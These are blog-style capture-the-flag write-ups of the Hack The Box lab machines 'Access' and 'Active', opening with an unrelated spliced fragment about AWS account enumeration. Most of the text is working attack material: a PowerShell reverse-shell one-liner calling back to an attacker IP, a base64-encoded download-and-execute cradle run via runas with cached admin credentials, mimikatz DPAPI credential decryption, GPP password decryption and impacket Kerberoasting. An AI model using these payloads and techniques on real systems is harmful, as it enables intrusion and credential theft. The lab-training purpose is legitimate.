Error Enumeration: The tool exploits differences in AWS error responses to identify valid account IDs

The Vulnerability Chain

Exposed Credentials: IAM user credentials available in the engagement
Permissive Role Trust Policy: The LeakyBucket role allows assumption from our user
Verbose Error Messages: AWS provides enough detail in errors to enumerate account IDs
S3 Bucket Metadata: The bucket's true owner (account ID) is discoverable through this process

HTB Machine Access May 2025

Thu, 22 May 2025 00:00:00 GMT

Scanning

Rustscan

rustscan -a 10.10.10.98 -b 100

Nmap

nmap -sC -sV -T5 -oA nmap/initials 10.10.10.98

# Nmap 7.94SVN scan initiated Thu May 22 14:38:21 2025 as: nmap -sC -sV -T5 -oA nmap/initials 10.10.10.98
Nmap scan report for 10.10.10.98 (10.10.10.98)
Host is up (0.18s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can not get directory listing: PASV failed: 425 Cannot open data connection.
23/tcp open  telnet  Microsoft Windows XP telnetd
| telnet-ntlm-info: 
|   Target_Name: ACCESS
|   NetBIOS_Domain_Name: ACCESS
|   NetBIOS_Computer_Name: ACCESS
|   DNS_Domain_Name: ACCESS
|   DNS_Computer_Name: ACCESS
|_  Product_Version: 6.1.7600
80/tcp open  http    Microsoft IIS httpd 7.5
|_http-server-header: Micros
oft-IIS/7.5
|_http-title: MegaCorp
| http-methods: 
|_  Potentially risky methods: TRACE
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
|_clock-skew: 4s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu May 22 14:39:05 2025 -- 1 IP address (1 host up) scanned in 43.64 seconds

Key Findings:

Port 21 - FTP with Anonymous login allowed (this looks juicy! 🍖)
Port 23 - Telnet service running
Port 80 - IIS 7.5 (older version, potentially vulnerable)
The FTP anonymous access immediately caught my attention - it's like finding an unlocked door in a security assessment!

Enumeration

FTP Anonymous Access

First, I checked the FTP anonymous login since it looked very promising, and boy, it delivered! I discovered two interesting directories:

Backups\backup.mdb
Engineers\Active Control.zip

File Download Process

I downloaded these files using the get command, but here's a crucial tip: you need to set binary mode for proper file transfer, otherwise you'll encounter some weird errors that'll make you question your life choices.

Initial File Analysis

After downloading, I discovered:

backup.mdb is a Microsoft Access Database file
The zip file is password-protected (of course it is! 🔐)

Database Analysis

I analyzed the backup.mdb file and found numerous table names. Here's the complete list for reference:

acc_antiback | acc_door | acc_firstopen | acc_firstopen_emp | acc_holidays | acc_interlock | acc_levelset | acc_levelset_door_group | acc_linkageio | acc_map | acc_mapdoorpos | acc_morecardempgroup | acc_morecardgroup | acc_timeseg | acc_wiegandfmt | ACGroup | acholiday | ACTimeZones | action_log | AlarmLog | areaadmin | att_attreport | att_waitforprocessdata | attcalclog | attexception | AuditedExc | auth_group_permissions | auth_message | auth_permission | auth_user | auth_user_groups | auth_user_user_permissions | base_additiondata | base_appoption | base_basecode | base_datatranslation | base_operatortemplate | base_personaloption | base_strresource | base_strtranslation | base_systemoption | CHECKEXACT | CHECKINOUT | dbbackuplog | DEPARTMENTS | deptadmin | DeptUsedSchs | devcmds | devcmds_bak | django_content_type | django_session | EmOpLog | empitemdefine | EXCNOTES | FaceTemp | iclock_dstime | iclock_oplog | iclock_testdata | iclock_testdata_admin_area | iclock_testdata_admin_dept | LeaveClass | LeaveClass1 | Machines | NUM_RUN | NUM_RUN_DEIL | operatecmds | personnel_area | personnel_cardtype | personnel_empchange | personnel_leavelog | ReportItem | SchClass | SECURITYDETAILS | ServerLog | SHIFT | TBKEY | TBSMSALLOT | TBSMSINFO | TEMPLATE | USER_OF_RUN | USER_SPEDAY | UserACMachines | UserACPrivilege | USERINFO | userinfo_attarea | UsersMachines | UserUpdates | worktable_groupmsg | worktable_instantmsg | worktable_msgtype | worktable_usrmsg | ZKAttendanceMonthStatistics | acc_levelset_emp | acc_morecardset | ACUnlockComb | AttParam | auth_group | AUTHDEVICE | base_option | dbapp_viewmodel | FingerVein | devlog | HOLIDAYS | personnel_issuecard | SystemLog | USER_TEMP_SCH | UserUsedSClasses | acc_monitor_log | OfflinePermitGroups | OfflinePermitUsers | OfflinePermitDoors | LossCard | TmpPermitGroups | TmpPermitUsers | TmpPermitDoors | ParamSet | acc_reader | acc_auxiliary | STD_WiegandFmt | CustomReport | ReportField | BioTemplate | FaceTempEx | FingerVeinEx | TEMPLATEEx

Database Content Extraction

I used the online MDB viewer at https://www.mdbopener.com/ to open the database file and downloaded it as an Excel file for easier analysis.

Credential Discovery

After thoroughly examining all tables, I struck gold in the auth_user table, which contained some tasty credentials:

|id|username    |password         |Status  |last_login|RoleID|Remark|
|25| admin      |admin            |1       |08/23/18 21:11:47|26||
|27|engineer    |access4u@security|1       |08/23/18 21:13:36|26||
|28|backup_admin|admin            |1       |08/23/18 21:14:02|26||

ZIP File Password Cracking

Remember that encrypted zip file from the engineer's folder? Well, access4u@security looked like a perfect candidate for the password, and guess what? It worked like a charm! 🎯

PST File Analysis

The zip file contained a .pst (Microsoft Outlook Personal Storage) file:

I used pst-utils to extract the content from this file, which generated an .mbox file containing HTML-formatted email data.

Email Content Analysis

From the extracted email file, I discovered another set of credentials for the Security user with the password 4Cc3ssC0ntr0ller. Since we know Telnet is available on port 23, these credentials are likely our ticket in!

From "john@megacorp.com" Fri Aug 24 05:14:07 2018
Status: RO
From: john@megacorp.com <john@megacorp.com>
Subject: MegaCorp Access Control System "security" account
To: 'security@accesscontrolsystems.com'
Date: Thu, 23 Aug 2018 23:44:07 +0000
MIME-Version: 1.0
Content-Type: multipart/mixed;
	boundary="--boundary-LibPST-iamunique-928963397_-_-"


----boundary-LibPST-iamunique-928963397_-_-
Content-Type: multipart/alternative;
	boundary="alt---boundary-LibPST-iamunique-928963397_-_-"

--alt---boundary-LibPST-iamunique-928963397_-_-
Content-Type: text/plain; charset="utf-8"

Hi there,

 

The password for the "security" account has been changed to 4Cc3ssC0ntr0ller.  Please ensure this is passed on to your engineers.

 

Regards,

John


--alt---boundary-LibPST-iamunique-928963397_-_-
Content-Type: text/html; charset="us-ascii"

<html xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:w="urn:schemas-microsoft-com:office:word" xmlns:m="http://schemas.microsoft.com/office/2004/12/omml" xmlns="http://www.w3.org/TR/REC-html40"><head><meta http-equiv=Content-Type content="text/html; charset=us-ascii"><meta name=Generator content="Microsoft Word 15 (filtered medium)"><style><!--
/* Font Definitions */
@font-face
	{font-family:"Cambria Math";
	panose-1:0 0 0 0 0 0 0 0 0 0;}
@font-face
	{font-family:Calibri;
	panose-1:2 15 5 2 2 2 4 3 2 4;}
/* Style Definitions */
p.MsoNormal, li.MsoNormal, div.MsoNormal
	{margin:0in;
	margin-bottom:.0001pt;
	font-size:11.0pt;
	font-family:"Calibri",sans-serif;}
a:link, span.MsoHyperlink
	{mso-style-priority:99;
	color:#0563C1;
	text-decoration:underline;}
a:visited, span.MsoHyperlinkFollowed
	{mso-style-priority:99;
	color:#954F72;
	text-decoration:underline;}
p.msonormal0, li.msonormal0, div.msonormal0
	{mso-style-name:msonormal;
	mso-margin-top-alt:auto;
	margin-right:0in;
	mso-margin-bottom-alt:auto;
	margin-left:0in;
	font-size:11.0pt;
	font-family:"Calibri",sans-serif;}
span.EmailStyle18
	{mso-style-type:personal-compose;
	font-family:"Calibri",sans-serif;
	color:windowtext;}
.MsoChpDefault
	{mso-style-type:export-only;
	font-size:10.0pt;
	font-family:"Calibri",sans-serif;}
@page WordSection1
	{size:8.5in 11.0in;
	margin:1.0in 1.0in 1.0in 1.0in;}
div.WordSection1
	{page:WordSection1;}
--></style><!--[if gte mso 9]><xml>
<o:shapedefaults v:ext="edit" spidmax="1026" />
</xml><![endif]--><!--[if gte mso 9]><xml>
<o:shapelayout v:ext="edit">
<o:idmap v:ext="edit" data="1" />
</o:shapelayout></xml><![endif]--></head><body lang=EN-US link="#0563C1" vlink="#954F72"><div class=WordSection1><p class=MsoNormal>Hi there,<o:p></o:p></p><p class=MsoNormal><o:p>&nbsp;</o:p></p><p class=MsoNormal>The password for the &#8220;security&#8221; account has been changed to 4Cc3ssC0ntr0ller.&nbsp; Please ensure this is passed on to your engineers.<o:p></o:p></p><p class=MsoNormal><o:p>&nbsp;</o:p></p><p class=MsoNormal>Regards,<o:p></o:p></p><p class=MsoNormal>John<o:p></o:p></p></div></body></html>
--alt---boundary-LibPST-iamunique-928963397_-_---

----boundary-LibPST-iamunique-928963397_-_---

Exploitation

Telnet Authentication

Time to put these credentials to the test! I attempted to login via Telnet using:

Username: security
Password: 4Cc3ssC0ntr0ller

Success! We're in the system! 🎉

User Flag Capture

After gaining access, I was able to retrieve the user flag:

52a53e342f7c24182f28cdef8ba4b490

Post Exploitation

Now comes the fun part - but also the frustrating part! This shell is incredibly unstable, and many standard payloads just refuse to cooperate. Let me share my journey through payload hell:

Initial Payload Struggles

I tried multiple approaches, all of which failed spectacularly:

Certutil for payload delivery + Metasploit crafted exe → Failed! 💥
PowerShell one-liner for payload delivery + Metasploit PowerShell payload → Failed again! 💥
Invoke-PowerShellTcp Nishang Shell → Still failed! 💥

The Solution That Actually Worked

You might be wondering: "Then what's the solution?"

I realized the issue was likely due to being in a cmd prompt environment, so I decided to get a proper PowerShell session first. Enter RevShells - the unexpected hero of this engagement!

Here's the life-saving payload that actually worked:

powershell -nop -W hidden -noni -ep bypass -c "$TCPClient = New-Object Net.Sockets.TCPClient('10.10.16.2', 1337);$NetworkStream = $TCPClient.GetStream();$StreamWriter = New-Object IO.StreamWriter($NetworkStream);function WriteToStream ($String) {[byte[]]$script:Buffer = 0..$TCPClient.ReceiveBufferSize | % {0};$StreamWriter.Write($String + 'SHELL> ');$StreamWriter.Flush()}WriteToStream '';while(($BytesRead = $NetworkStream.Read($Buffer, 0, $Buffer.Length)) -gt 0) {$Command = ([text.encoding]::UTF8).GetString($Buffer, 0, $BytesRead - 1);$Output = try {Invoke-Expression $Command 2>&1 | Out-String} catch {$_ | Out-String}WriteToStream ($Output)}$StreamWriter.Close()"

Finally! A working shell! 🎯

Privilege Escalation Discovery

Cached Credentials Detection

Running cmdkey /list revealed that administrator credentials are cached on the system:

Shortcut File Analysis

I discovered an interesting shortcut file at C:\Users\Public\Desktop\ZKAccess3.5 Security System.lnk:

To find the actual executable and its arguments, I used this PowerShell command:

powershell -command "$s = (New-Object -ComObject WScript.Shell).CreateShortcut('ZKAccess3.5 Security System.lnk'); Write-Output $s.TargetPath; Write-Output $s.Arguments"

The output revealed:

C:\Windows\System32\runas.exe
/user:ACCESS\Administrator /savecred "C:\ZKTeco\ZKAccess3.5\Access.exe"

Understanding the Privilege Escalation Vector

This is our privilege escalation point! The runas.exe binary (a built-in Windows utility) allows running specific programs with different user credentials. In this case, it's configured to run Access.exe with Administrator privileges using cached credentials (/savecred flag).
Important Note: For those used to Linux environments, runas can be frustrating. Unlike su or sudo, it doesn't let you switch users in the same terminal - it opens a new process in a new window. This means we can't simply run runas type \users\administrator\desktop\root.txt and expect to see results in our current session.

Getting Administrator Shell

The Plan

We need to replace C:\ZKTeco\ZKAccess3.5\Access.exe with our payload. However, this proved to be another challenge with multiple failed attempts:
Meterpreter exe → Failed! 💥
Meterpreter PowerShell → Failed! 💥
Invoke-PowerShellTcp Nishang Shell → Also failed! 💥

The Unicode Encoding Solution

After watching HTB Legend IppSec's video, I discovered the issue might be related to Unicode encoding differences.
The solution was to encode the payload using UTF-16LE and then base64 encode it:

echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.16.2/Invoke-PowerShellTcp.ps1')" | iconv --to-code UTF-16LE | base64 -w 0

# Output: SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANgAuADIALwBJAG4AdgBvAGsAZQAtAFAAbwB3AGUAcgBTAGgAZQBsAGwAVABjAHAALgBwAHMAMQAnACkA

Then crafting the final payload:

powershell -e SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANgAuADIALwBJAG4AdgBvAGsAZQAtAFAAbwB3AGUAcgBTAGgAZQBsAGwAVABjAHAALgBwAHMAMQAnACkA

Final runas command:

runas /user:ACCESS\Administrator /savecred "powershell -e SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADEANgAuADIALwBJAG4AdgBvAGsAZQAtAFAAbwB3AGUAcgBTAGgAZQBsAGwAVABjAHAALgBwAHMAMQAnACkA"

Administrator Access Achieved!

Success! We finally got the Administrator shell:

Root Flag Capture

And here's the coveted root flag:

5170bed5b1b9cef6810de87dc664caa6

Beyond Root

DPAPI (Windows Data Protection API) Credential Extraction and Decryption Process

🔍 Background

The technique I'm about to demonstrate is called DPAPI Credential Extraction and Decryption - a Windows post-exploitation privilege escalation method that leverages the Data Protection API (DPAPI) to extract and decrypt sensitive user credentials such as saved passwords or tokens.

Key Points about DPAPI:

DPAPI is used by Windows to securely store secrets like browser credentials, Wi-Fi passwords, and RDP credentials
It encrypts data using a user-specific Master Key tied to the user's password and SID
Master keys are stored under %APPDATA%\Microsoft\Protect\<SID>\
The master key itself is encrypted using a key derived from the user's logon credentials
This enables retrieval of plaintext secrets without needing elevated privileges in scenarios where user credentials are cached

What you need for successful decryption:

The encrypted master key
The user's plaintext password
The SID
The encrypted credentials blob

Getting Important Files

Our mission: find the administrator's plaintext password from the cached credentials.
I need to copy files from these two locations:
- C:\Users\security\AppData\Roaming\Microsoft\Protect\S-1-5-21-953262931-566350628-63446256-1001
- C:\Users\security\AppData\Roaming\Microsoft\Credentials\S-1-5-21-953262931-566350628-63446256-1001

File 1: Master Key (`0792c32e-48a5-4fe3-8b43-d93d64590580`)

Since this file contains non-printable bytes, I need to convert it to base64 for transport:

certutil -encode 0792c32e-48a5-4fe3-8b43-d93d64590580 output
type output

File 2: Credentials Blob (`51AB168BE4BDB3A603DADE4F8CA81290`)

Same process - converting to base64:

certutil -encode 51AB168BE4BDB3A603DADE4F8CA81290 output
type output

Decrypt Master Key

For master key decryption, I'll use mimikatz on a Windows machine (I'm using Flare VM with Windows Defender disabled):

mimikatz # dpapi::masterkey /in:masterkey /sid:S-1-5-21-953262931-566350628-63446256-1001 /password:4Cc3ssC0ntr0ller

Full mimikatz output:

C:\Users\flare\Desktop
λ mimikatz.x64.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX 
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # dpapi::masterkey /in:masterkey /sid:S-1-5-21-953262931-566350628-63446256-1001 /password:4Cc3ssC0ntr0ller
**MASTERKEYS**
  dwVersion          : 00000002 - 2
  szGuid             : {0792c32e-48a5-4fe3-8b43-d93d64590580}
  dwFlags            : 00000005 - 5
  dwMasterKeyLen     : 000000b0 - 176
  dwBackupKeyLen     : 00000090 - 144
  dwCredHistLen      : 00000014 - 20
  dwDomainKeyLen     : 00000000 - 0
[masterkey]
  **MASTERKEY**
    dwVersion        : 00000002 - 2
    salt             : 9c51ca4d00708c73d4fbff60b95e549e
    rounds           : 000043f8 - 17400
    algHash          : 0000800e - 32782 (CALG_SHA_512)
    algCrypt         : 00006610 - 26128 (CALG_AES_256)
    pbKey            : e78fb1d989c4ccd7a05285c17fae1c31ad1210f7ada051ae3203536df613e63a0e4647ca9ed51407637d8c1cc2ad16b2306aab56d7d2707b0c77422e7de39eb8bdfcca55044b4a7f853b6f0b3333213b5b0d80c7c1021f6c4ac2f5fa3772adbe50af7fdf07b0e0ea940d70a1245db7df847f615530a93895012a3ad9c7a8c39cc0592d06d714c9ee8fe34ced5062c412

[backupkey]
  **MASTERKEY**
    dwVersion        : 00000002 - 2
    salt             : 4bb6dd9b5b9656d97b78f114796457f4
    rounds           : 000043f8 - 17400
    algHash          : 0000800e - 32782 (CALG_SHA_512)
    algCrypt         : 00006610 - 26128 (CALG_AES_256)
    pbKey            : 0fe6b3aa5dd3af46bd7a87cbc0161fc41ae13f8714a22bcb5bda86f24d95ad03369a5335159185d0276743d0c1132b35fdaffad247d3c4f5f43260413c28b401ed70e42e0184f9e8c4668abc36eb7327bd2c7374a2381b4cdd4ea7c465deaa755e0f53672473900db8868b428327edaa

[credhist]
  **CREDHIST INFO**
    dwVersion        : 00000003 - 3
    guid             : {009668e5-9305-401b-ba0d-dfa0e11b34d0}



[masterkey] with password: 4Cc3ssC0ntr0ller (normal user)
  key : b360fa5dfea278892070f4d086d47ccf5ae30f7206af0927c33b13957d44f0149a128391c4344a9b7b9c9e2e5351bfaf94a1a715627f27ec9fafb17f9b4af7d2
  sha1: bf6d0654ef999c3ad5b09692944da3c0d0b68afe

Decrypt Credentials

Now for the final step - decrypting the stored credentials:

mimikatz # dpapi::cred /in:credentials

Full credentials decryption output:

mimikatz # dpapi::cred /in:credentials
**BLOB**
  dwVersion          : 00000001 - 1
  guidProvider       : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
  dwMasterKeyVersion : 00000001 - 1
  guidMasterKey      : {0792c32e-48a5-4fe3-8b43-d93d64590580}
  dwFlags            : 20000000 - 536870912 (system ; )
  dwDescriptionLen   : 0000003a - 58
  szDescription      : Enterprise Credential Data

  algCrypt           : 00006610 - 26128 (CALG_AES_256)
  dwAlgCryptLen      : 00000100 - 256
  dwSaltLen          : 00000020 - 32
  pbSalt             : f5bbbac240bd90d9af7d3c2cfb7f301f1f123ac94d07a3cc012038135fa5a6bc
  dwHmacKeyLen       : 00000000 - 0
  pbHmackKey         :
  algHash            : 0000800e - 32782 (CALG_SHA_512)
  dwAlgHashLen       : 00000200 - 512
  dwHmac2KeyLen      : 00000020 - 32
  pbHmack2Key        : f9642d323fae366a4f7293d02f26e4472adc32b00bac6a061914458dadfd3e52
  dwDataLen          : 00000100 - 256
  pbData             : e73542ff71d08529f9da5ff88edcd5be44d11c9c02c45fdfd9ee5a531628cb0f9e8dc221eb5b4d83a857aff13473131c927527217fe177e08d63a63eb5ce5341576b33332806e062363e58786fb7551aaa2e0676b8e3957f43cf1f11a2ed149c431104e5f93f20364916df25a0168ede23788bd9d71192cdb661c5c5686ed256c8691057fe6fe2a2b1765ba0979ee9140c010210eea81ac00830f74c35a196ac1f46bd69d7a86ca82da15f9bbcf1c40cbbe41d58d4a8924afde97e2a99a6e9f33a297ef2508401c229a451b911e9469ba17d71288dc6c37ee26c65ecc8accd4b5b3c0c2ccfcae6b0a76384a0e27c4edb7a0ecece2afd9889252304db5767bbc3
  dwSignLen          : 00000040 - 64
  pbSign             : 63fcc153bcd60befd074a5098ea0e552f8809562c553985baa8720a828e61e05bd5d1cb8200711551a100ed3b853598b3875ba90b689bc483342fbf671b89c99

Decrypting Credential:
 * volatile cache: GUID:{0792c32e-48a5-4fe3-8b43-d93d64590580};KeyHash:bf6d0654ef999c3ad5b09692944da3c0d0b68afe;Key:available
**CREDENTIAL**
  credFlags      : 00000030 - 48
  credSize       : 000000f4 - 244
  credUnk0       : 00002004 - 8196

  Type           : 00000002 - 2 - domain_password
  Flags          : 00000000 - 0
  LastWritten    : 8/22/2018 9:18:49 PM
  unkFlagsOrSize : 00000038 - 56
  Persist        : 00000003 - 3 - enterprise
  AttributeCount : 00000000 - 0
  unk0           : 00000000 - 0
  unk1           : 00000000 - 0
  TargetName     : Domain:interactive=ACCESS\Administrator
  UnkData        : (null)
  Comment        : (null)
  TargetAlias    : (null)
  UserName       : ACCESS\Administrator
  CredentialBlob : 55Acc3ssS3cur1ty@megacorp
  Attributes     : 0

The Final Prize 🏆

Administrator Password:

55Acc3ssS3cur1ty@megacorp

HTB Machine Active May 2025

Wed, 21 May 2025 00:00:00 GMT

Scanning

Rustscan

rustscan -a 10.10.10.100 -b 100

Found a whopping 23 open ports! But who has time to check them all? Let's focus on the juicy ones.
Time to be selective and target what actually matters. Quality over quantity, folks!

Nmap

Let's hit it with the classic nmap scan:

nmap -sC -sV -T5 -oA nmap/initials 10.10.10.100

# Nmap 7.94SVN scan initiated Wed May 21 15:22:32 2025 as: nmap -sC -sV -T5 -oA nmap/initials 10.10.10.100
Warning: 10.10.10.100 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.100 (10.10.10.100)
Host is up (0.19s latency).
Not shown: 852 closed tcp ports (conn-refused), 132 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-05-21 09:53:33Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
49152/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49158/tcp open  msrpc         Microsoft Windows RPC
49165/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-05-21T09:54:32
|_  start_date: 2025-05-21T09:50:49
|_clock-skew: 2s
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed May 21 15:24:41 2025 -- 1 IP address (1 host up) scanned in 129.89 seconds

Hello Active Directory, my old friend! We've got SMB, Kerberos, LDAP... the whole Windows domain party pack!
Running a specific script on port 445 confirms it's using SMB v2:

nmap --script safe -p 445 10.10.10.100 -T5

Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-21 16:16 IST
Pre-scan script results:
| targets-asn: 
|_  targets-asn.asn is a mandatory parameter
|_hostmap-robtex: *TEMPORARILY DISABLED* due to changes in Robtex's API. See https://www.robtex.com/api/
|_http-robtex-shared-ns: *TEMPORARILY DISABLED* due to changes in Robtex's API. See https://www.robtex.com/api/
Nmap scan report for active.htb (10.10.10.100)
Host is up (0.47s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds
|_smb-enum-services: ERROR: Script execution failed (use -d to debug)

Host script results:
| port-states: 
|   tcp: 
|_    open: 445
| smb-protocols: 
|   dialects: 
|     2:0:2
|_    2:1:0
| smb2-time: 
|   date: 2025-05-21T10:47:09
|_  start_date: 2025-05-21T09:50:49
| smb-mbenum: 
|_  ERROR: Failed to connect to browser service: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
| dns-blacklist: 
|   PROXY
|     tor.dan.me.uk - FAIL
|     dnsbl.tornevall.org - FAIL
|     socks.dnsbl.sorbs.net - FAIL
|     misc.dnsbl.sorbs.net - FAIL
|     http.dnsbl.sorbs.net - FAIL
|   SPAM
|     list.quorum.to - FAIL
|     sbl.spamhaus.org - FAIL
|     l2.apews.org - FAIL
|     all.spamrats.com - FAIL
|     spam.dnsbl.sorbs.net - FAIL
|     dnsbl.inps.de - FAIL
|     bl.spamcop.net - FAIL
|_    bl.nszones.com - FAIL
|_msrpc-enum: Could not negotiate a connection:SMB: Failed to receive bytes: ERROR
|_fcrdns: FAIL (No A record)
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled and required
|_clock-skew: 2s
| unusual-port: 
|_  WARNING: this script depends on Nmap's service/version detection (-sV)
| smb2-capabilities: 
|   2:0:2: 
|     Distributed File System
|   2:1:0: 
|     Distributed File System
|     Leasing
|_    Multi-credit operations

Post-scan script results:
| reverse-index: 
|_  445/tcp: 10.10.10.100
Nmap done: 1 IP address (1 host up) scanned in 67.15 seconds

Enumeration

SMB Shares Exploration

When SMB port is open, it's like finding an unlocked door. Let's check what shares are available using smbmap:

smbmap -H 10.10.10.100

Look at that! We've got some readable shares! Time to go treasure hunting.
Let's try accessing with smbclient using a blank password (because security is clearly optional):

Success! Found an active.htb directory. Let's mount this in our file manager and copy it locally:

smb://10.10.10.100/Replication

Analyzing Directory from SMB Share

After some digital spelunking in the directories (aka clicking around aimlessly), I found credentials gold:
- Located at: active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml
- Found creds: active.htb\SVC_TGS : edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
- This is GPP-encrypted password stored in the GPP XML.
- The encryption is weak (AES 256, static key) — Microsoft published the key, so we can decrypt it easier than making instant noodles.

<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">

	<User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}">
	
		<Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/>
		
	</User>
	
</Groups>

Exploitation

Password Decryption

Time to crack that "encryption" with gpp-decrypt (which is really just asking nicely for the password):

sudo apt install gpp-decrypt
gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ

Decrypted User (SVC_TGS) Password: GPPstillStandingStrong2k18

Seriously? "GPPstillStandingStrong2k18"? That's like naming your password "ThisIsDefinitelyNotMyPassword2k18". Security through obscurity at its finest!

Exploring SMB Shares with User (SVC_TGS) Credentials

That "Users" share is looking mighty interesting. Let's take a peek:

smbclient //10.10.10.100/Users -U active.htb\\SVC_TGS%GPPstillStandingStrong2k18

User Flag captured like a Pokémon:

28dfe94c068ab577d1ffc5233ae55bbf

Post Exploitation

Kerberoasting

Background

Kerberos is a protocol for authentication used in Windows Active Directory environments (though it can be used for auth to Linux hosts as well).
In 2014, Tim Medin presented an attack on Kerberos he called Kerberoasting.
It's like asking for the keys to the kingdom, and then making a copy while nobody's looking.
When you want to authenticate to a service using Kerberos:
1. You contact the Domain Controller and say "I want to talk to ServiceX"
2. The DC encrypts a response ticket using the service's password hash
3. You're supposed to forward this ticket to the service
But in Kerberoasting, we take a detour:
- Instead of sending the ticket to the service, we try to crack the encryption offline
- If we succeed, we get the service account's password!
Most of the time you need an active domain account to start Kerberoasting, but if the DC has "Do not require Kerberos preauthentication" enabled, you can get tickets without even having an account. It's like the security guard leaving the backdoor unlocked.

Getting the Hash

I'll use impacket-GetUserSPNs to hunt for service accounts associated with regular users. It's like fishing for admin accounts:

impacket-GetUserSPNs -request -dc-ip 10.10.10.100 active.htb/SVC_TGS -save -outputfile GetUserSPNs.out

Jackpot! We found the Administrator account!
Hash type: Kerberos 5 TGS-REP etype 23

$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$33896a188ef8c0ac270415aa464f2700$033ddece02c45d6cdf5dcbb0b8b840f547597db2d66c12ddd9ed70b85a5397285a8ece990722a0aaf98fd8bb7391986d9b47176f84cf4f487563e4cf9042dd872f8f86f3d6e142a5f83bd754509bbe891ce4e451539f6dbaa343b45fa5ed7dd93aec8232b3f2521fca6e3d77308e6d6b67de5e664e4e18128a8386f4caf8d0e1a9bb2d24503183daa7fee8567e184cb136b76095aad78fc075ffb0ce44d96bbf8603badf64a92fbce26da34ad4f1916dd8e8f0dcfef381072361bc087b2b52655e50fb7c8ee12aada18c6c71bac61ce74ee912dfb00d37fb6f9dcde80ca76df4a2d693b3c2bf8ca262ee6d6bdc38784fb59b57af97aa7ca01e7896ac970fd13de4cbbc0e5b956b593d1fe6aa7e13062bdeb02a29688f202a9c3e7023d8a7ddd6b6177952cb07e588118443f648f0a028652679a5ccdc0dd97eda01157be28c93d1b8c2a89486042355c44f24b33aea72b12b3682e1f50b554ab4adae9963ccbe635418b8fa8023340e28782108b02d427d0fa960fb171791330eb228d4ace8536344e56537843f15a71cb597d9603d2e0d53aa2c4294a2c8e39b6976090022d084a46cc3061df8b31a073eab6c9d9352e1abf7858400b4c8481354882041d5dd605327f631c92eecdd12af1811d